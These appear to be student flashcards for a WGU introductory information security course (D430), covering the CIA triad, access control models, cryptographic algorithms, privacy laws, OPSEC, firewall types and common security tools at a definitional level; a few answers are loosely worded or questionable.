WGU's D430 Flashcards
A tornado destroyed a data center. Which side of the CIA triad is most affected?
Authenticity
Availability
Utility
Integrity
Availability ensures authorized users have access to resources when needed.
What element of the Parkerian Hexad is concerned with usefulness?
Integrity
Confidentiality
Utility
Availability
Utility refers to how useful the data is.
Which attribute of the Parkerian hexad allows for proper attribution of the owner of a dataset?
Possession
Availability
Authenticity
Integrity
Authenticity is the process of ensuring and confirming that the identity of the user is genuine and legitimate. Proving who you are.
Which type of attack category is an attack against confidentiality?
Interception.
Modification.
Fabrication.
Interruption.
Interception attacks allow unauthorized users to access data, applications, or environments.
Which two attributes are included in the concept of risk? Choose two answers.
Threats
Frequency
Vulnerabilities
Impacts
A threat is something that has the potential to cause harm.
Vulnerabilities are weaknesses that can be used to cause harm.
Which phase of the incident response (IR) process includes putting the system back better than the original state?
Post-incident activity.
Containment.
Recovery.
Detection and Analysis
The goal of the recovery phase is to recover to a better state than prior to the incident. This may include activities such as restoring devices or data from backups, rebuilding systems, reloading applications, and mitigating the attack vectors that were used.
Which concept refers to adding layers of security to our networks?
Administrative control depth.
Defense in depth.
Physical control depth.
Logical control depth.
Defense in depth is the coordinated use of multiple layers of security countermeasures to protect the integrity of the information assets.
Which concept refers to adding layers of security to our networks?
Administrative control depth.
Defense in depth.
Physical control depth.
Logical control depth.
Defense in depth is the coordinated use of multiple layers of security countermeasures to protect the integrity of the information assets.
Which combination of factors demonstrates multi-factor authentication?
Fingerprint and voice print
Password and Pin
Password and fingerprint
Voice print and weight
These two items include “something you know” and “something you are.”
What is the name of the process where the client authenticates the server and the server authenticates the client?
Token-based authentication
Mutual authentication
Two-factor authentication
Multifactor authentication
Mutual authentication is an authentication mechanism where both parties authenticate each other at the same time.
What is an example of identification?
Text to cell phone
Employee Number
Update Access
Fingerprint
Identification is the process of ascribing a user identifier (ID) to a human being or to another computer or network component.
What is an example of authentication?
Username
First Car
Read Only
Pin
Authentication refers to the verification of a process or user. A pin can be used to verify a user or process after successful identification.
What is an objective for performing an audit?
To ensure a company can respond effectively to a disaster.
To ensure compliance and detect misuse.
To ensure potential risks are identified and analyzed.
To ensure proper access is granted to resources.
Audits are performed to ensure compliance with applicable laws, policies, and other administrative controls is being accomplished as well as detecting misuse.
What are two common values for a network access control list (ACL)? Choose two answers.
Accept
Agree
Disagree
Deny
Allow
Permissions in network ACLs tend to be binary in nature, consisting of deny or allow. Deny does not permit access to defined resources. Allow permits access to defined resources.
What are two common types of access control lists (ACLs)? Choose two answers.
File system
Allow
Network
Deny
Database system
Access to files and directories is managed through access control lists (ACLs). It ensures that only authorized users get access to directories and files.
Access to network resources is managed through access control lists (ACLs). It ensures that only authorized users get access to network resources.
Which access control model allows access to be determined by the owner of the resource?
Mandatory access control (MAC)
Attribute-based access control (ABAC)
Role-based access control (RBAC)
Discretionary access control (DAC)
Discretionary access control (DAC) is an access control model based on access being determined by the owner of the resource.
Which form of access control uses CAPTCHAs?
Attribute-based access control (ABAC)
Rule-based access control (RBAC)
Media access control (MAC)
Discretionary Access Control (DAC)
Attribute-based access control is based on the attributes of a particular person, resources, or environment.
What is the disadvantage of logging?
Highly configurable
Resources
Reactive tool
History of activities
“logging” refers to the process of recording events, processes, and activities within a system, application, or any information technology environment.
Being “a reactive tool” refers to a system, process, or tool that responds to events or incidents after they have occurred, rather than preventing them proactively.
Resources: It takes up storage space.
Which cryptographic algorithm is obsolete?
Hash functions
Asymmetric key cryptography
Caeser cypher
Symmetric key cryptography
This was an early form of encryption named after Julius Caesar that’s easily breakable.
Which two laws protect the privacy of medical records and electronic health care information? Choose two answers.
HIPAA
PCI-DSS
HITECH
SOX
GLBA
HIPAA: The Health Insurance Portability and Accountability Act of 1996 is a U.S. law designed to protect patients’ medical records and other health information provided to health plans, doctors, hospitals, and other healthcare providers. It sets standards for the protection of health information privacy and the security of electronic health records.
HITECH: The Health Information Technology for Economic and Clinical Health Act, enacted as part of the American Recovery and Reinvestment Act of 2009, aims to promote the adoption and meaningful use of health information technology. It strengthens the data privacy and security protections established by HIPAA, especially for electronic health records, and introduces stricter enforcement measures.
What jurisdiction does the General Data Protection Regulation regulate?
China
Russia
The European Union
The United States
Developed by the EU for data privacy.
Which act regulates the United States department of education?
GLBA
FERPA
GDPR
FISMA
FERPA protects student privacy.
Which act regulates federal departments in the United States?
GLBA
SOX
GDPR
FISMA
FISMA
Correct: Mandates government agencies to protect information systems.
Which act regulates customer privacy in the finance industry?
GLBA
SOX
GDPR
FISMA
The GLBA requires financial institutions to explain information sharing practices.
Which act regulates reporting of publicly traded companies?
CFAA
SOX
GDPR
FOIA
SOX mandates certain practices for financial record keeping.
In the context of information security, the three states of data are:
Data at Rest: Data that is stored on physical or digital media, not actively moving from device to device or network to network. It’s often protected by encryption and access controls.
Data in Motion (or Data in Transit): Data actively moving through networks, such as the internet or private networks, from one location to another, such as from a local storage device to a cloud server. It’s protected by secure transmission protocols like SSL/TLS.
Data in Use: Data being processed or used by applications, often residing in computer memory (RAM). Protecting it involves measures like access controls and runtime encryption.
Which type of algorithm is a symmetric key?
DES
ECC
RSA
SHA
DES is a block cipher symmetric algorithm.
Incorrect:
ECC is an asymmetric algorithm.
RSA is an asymmetric algorithm.
SHA is a hashing algorithm.
Which type of algorithm is an asymmetric key?
ECC
MD5
SHA
DES
It’s an example of public key cryptography based on elliptic curves over infinite fields.
Which two types of algorithms are hashing algorithms? Choose two answers.
MD5
3DES
SHA
ECC
AES
RC4
MD5 is an example of a hashing algorithm.
SHA is an example of a hashing algorithm.
Which algorithm supports encryption for email?
ECC
AES
PGP
DES
PGP is an email program that supports encryption (Pretty Good Privacy).
What describes competitive intelligence?
The codename for a study conducted to curtail unauthorized passing of information.
The practice of managing the range of intelligence-gathering activities that are being directed at an organization.
The process that prevents sensitive information from getting into the wrong hands.
The process of intelligence gathering and analysis to support business decisions.
Competitive intelligence is the process of intelligence gathering and analysis to support business decisions.
The first law of operations security states:
“If you don’t know the threat, how do you know what to protect?”
Which law of operations security discusses the need to evaluate our information assets and determine what exactly we might consider to be our critical information?
The first law of operations security.
The second law of operations security.
The third law of operations security.
The fourth law of operations security.
The second law of operations security states, “If you don’t know what to protect, how do you know you are protecting it?”
The third law of operations security states:
“If you are not protecting it (the information)…THE DRAGON WINS!”
Which term refers to the practice of managing information gathering activities directed at an organization?
Purple Dragon
Competitive Counterintelligence
Operational Security
Competitive Intelligence
Correct: Competitive counterintelligence is the practice of managing the range of intelligence-gathering activities directed at an organization.
Incorrect: Operational Security is a security and risk management process that prevents sensitive information from getting into the wrong hands.
What describes risk assessment?
Identification of when there is a threat and a vulnerability that the threat can exploit.
Identification of what harm to the company can occur if important information is released.
Identifications of weaknesses that can harm a company.
Identification of information on which the company is based and everything depends.
Risk occurs when there is a matching threat and vulnerability. A risk assessment determines which risks require concern during the operations security process.
“what harm to the company can occur if important information is released” describes the potential impact assessment of a security breach.
Responsibility of the National Security Agency (NSA)
Present leaders with critical security information they need to defend our country.
Responsibility of the SysAdmin, Audit, Network, and Security (SANS) Institute.
Provide access to information technology research and education around the world.
Lead the national effort to understand, manage, and reduce risk to our cyber and physical infrastructure.
Responsibility of the Cybersecurity and Infrastructure Security Agency (CISA).
What is the responsibility of the Interagency OpSec Support Staff (IOSS)?
Provide access to information technology research and education around the world.
Present leaders with critical security information they need to defend our country.
Lead the national effort to understand, manage, and reduce risk to our cyber and physical infrastructure.
Provide multiple agencies with a wide variety of security awareness and training.
The Interagency OPSEC Support Staff (IOSS) is responsible for a wide variety of OPSEC awareness and training efforts.
Which type of social engineering attack utilizes credible scenarios to lure people into disclosing sensitive information?
Pretexting
Whaling
Baiting
Tailgating
Pretexting is a type of social engineering attack that utilizes credible scenarios to lure people into disclosing sensitive information.
Which social engineering technique uses electronic communications to carry out an attack that is broad in nature?
Masquerading
Tailgating
Baiting
Phishing
Phishing is an attack against a company, organization, or person carried out by an electronic means, such as email or text messages, to carry out an attack that is broad in nature.
Shodan Disclosure
Shodan is a search engine that scans the internet for various types of devices connected to the internet, such as servers, webcams, printers, routers, and other devices that are part of the Internet of Things (IoT). Unlike traditional search engines that index web content, Shodan indexes information related to the devices themselves, including their types, locations, operating systems, and open ports. This information can be invaluable for security research and analysis, helping to identify potentially vulnerable devices and networks.
A “Shodan disclosure” typically refers to the act of revealing vulnerabilities, exposed devices, or sensitive information found through searches conducted on Shodan.
Which set of policies and procedures outlines the steps an organization will take during a state of emergency to replace IT infrastructure?
Data protection directive
Business continuity
Disaster recovery
Data security standard
Disaster recovery planning refers to policies and procedures that are put in place to prepare for and respond to a state of emergency in the event some or all of an organization’s IT infrastructure is destroyed.
Which type of security control is a video surveillance system?
Proactive
Detective
Preventive
Deterrent
Detective controls such as video surveillance systems and burglar alarms, serve to detect and report undesirable events.
DMZ
A Demilitarized Zone (DMZ) in network security is a strategically implemented subnetwork that serves as an additional layer of protection, combining the use of security mechanisms like firewalls with network architecture practices such as segmentation. Its primary function is to restrict, monitor, and control the flow of traffic between the internet and an organization’s internal network. By doing so, it creates a controlled interface for external access to publicly available services—such as web and email servers—while safeguarding the internal network from unauthorized access, attacks, and exposure.
Proxy servers
Proxy servers are a specialized variant of a firewall that provide security and performance features by filtering traffic for attacks or undesirable content.
Deep packet
Deep packet inspection firewalls analyze the content of traffic and can reassemble the content to determine what will be delivered to the destination application.
Which type of firewall monitors and defends a system based on traffic patterns over a given connection?
Proxy servers
Deep packet
DMZ
Stateful packet
Stateful packet inspection firewalls defend networks by monitoring traffic patterns at a granular level over a given connection.
What is a wireless protocol?
RC4
WPA3
POP3
AES
WPA3 is a wireless protocol that uses AES encryption.
RC4
RC4 is a symmetric algorithm.
What is attack surface?
In information security, the “attack surface” refers to the sum total of all possible points (vulnerable spots or attack vectors) where an unauthorized user (the attacker) can try to enter or extract data from an environment. Essentially, it encompasses all the different ways an information system can be breached or compromised by an attacker.
What is “to perform system hardening”?
To perform system hardening means to take steps to reduce the attack surface of a system by securing its configurations, updating software to eliminate vulnerabilities, removing unnecessary services and applications, and enforcing the principle of least privilege. This process involves a comprehensive set of actions designed to protect against threats and minimize potential attack vectors.
When should updates be performed?
Semi-annually
After testing and vetting
After a system has been in production for many years
Immediately upon publication
It is prudent to test software updates thoroughly before installing them without delaying the process for very long.
Which port service needs to be removed when running a webserver?
80
22
53
443
Port 53 is typically blocked on webservers to prevent Domain Name System (DNS) servers from divulging critical information to attackers.
Which action is considered a significant event that should be included in the logging process?
A password change
A successful logon
An application closing
Administrative privilege
The use of administrative privileges is considered a significant event that should be closely monitored.
Which buffer size creates an entry point for a cyberattack when the buffer reaches 8 bytes?
16 bytes
12 bytes
8 bytes
4 bytes
A buffer overflow occurs when a program or process attempts to write more data to a fixed-length block of memory, or buffer, than the buffer is allocated to hold. At 8 bytes, the established buffer size has been exceeded.
Which tool is categorized as an exploit framework?
TCPdump
Nikto
OpenVas
Core Impact
Core Impact is a centralized penetration testing tool that enables security teams to conduct advanced, multi-phased penetration tests. It is a type of tool categorized as an exploit framework. Exploit frameworks include pre-packaged sets of exploits.
TCPdump
TCPdump is a data-network packet analyzer computer program that runs under a command line interface. It is not a type of tool categorized as an exploit framework.
Nikto
Nikto is an open-source Web server analysis tool that checks for common vulnerabilities. It is not a type of tool categorized as an exploit framework.
OpenVas
The OpenVAS scanner is a comprehensive vulnerability assessment system that can detect security issues in all manner of servers and network devices. It is not a type of tool categorized as an exploit framework.
Which symmetric encryption algorithm is the standard encryption algorithm used by the US Federal government?
DES
SHA-2
AES
RSA
AES is the standard encryption algorithm used by the US Federal government.
RSA
widely used for?
RSA is a widely used asymmetric encryption method used for many transactions including in the Secure Sockets Layer (SSL) protocol used to secure Web and email traffic.
SHA-2
used for wha?
SHA-2 is a hash function that is commonly used to validate and sign digital security certificates and documents.
XSS
Cross-site scripting (XSS) is a security vulnerability typically found in web applications. It allows attackers to inject malicious scripts into content that other users see and interact with.
What describes a database security issue?
Denial of Service
Unauthenticated access to functionality
Buffer overflows
Cross-site scripting
Allowing a user or process the opportunity to interact with the database without supplying a set of credentials creates potential database issues.
Which type of packet sniffer is used to monitor web traffic?
Fuzzer
Honeypot
Wireshark
Nessus
Wireshark is a sniffer that is capable of intercepting and troubleshooting traffic from both wired and wireless sources.
Nessus
Nessus will identify open ports and determine the services and versions of service running on those ports.
Also used to find and report network services on hosts that have known vulnerabilities.
Fuzzer
A fuzzer is a software testing tool used to find security vulnerabilities or bugs in software. It works by automatically generating and sending a wide range of invalid, unexpected, or random data as inputs to a computer program.
Which tools is used to perform web assessment and analysis?
Nessus
Burp Suite
Kismet
Hping3
Burp Suite is a web assessment and analysis tool that looks for issues on websites such as cross-site scripting or SQL injection flaws.
Burp Suite
A popular integrated platform used for testing the security of web applications. It offers a variety of tools for performing different security tests, including scanning for vulnerabilities, intercepting and modifying network traffic, and identifying weak points within an application.
Kismet
Kismet is a tool commonly used to detect wireless access points.
What are SSL and TLS, and how do they function in securing information transmitted over networks and the internet, particularly in relation to email protocols like IMAP and POP?
SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are cryptographic protocols designed to secure information sent over networks, including the internet. They provide encryption, authentication, and integrity of data in transit, ensuring that any data sent between the client and server is protected from eavesdropping and tampering. SSL and TLS operate in conjunction with other protocols, such as the Internet Message Access Protocol (IMAP) and the Post Office Protocol (POP), which are used for email communication. By integrating with these email protocols, SSL and TLS help safeguard email data as it travels across the network, protecting sensitive information from unauthorized access.
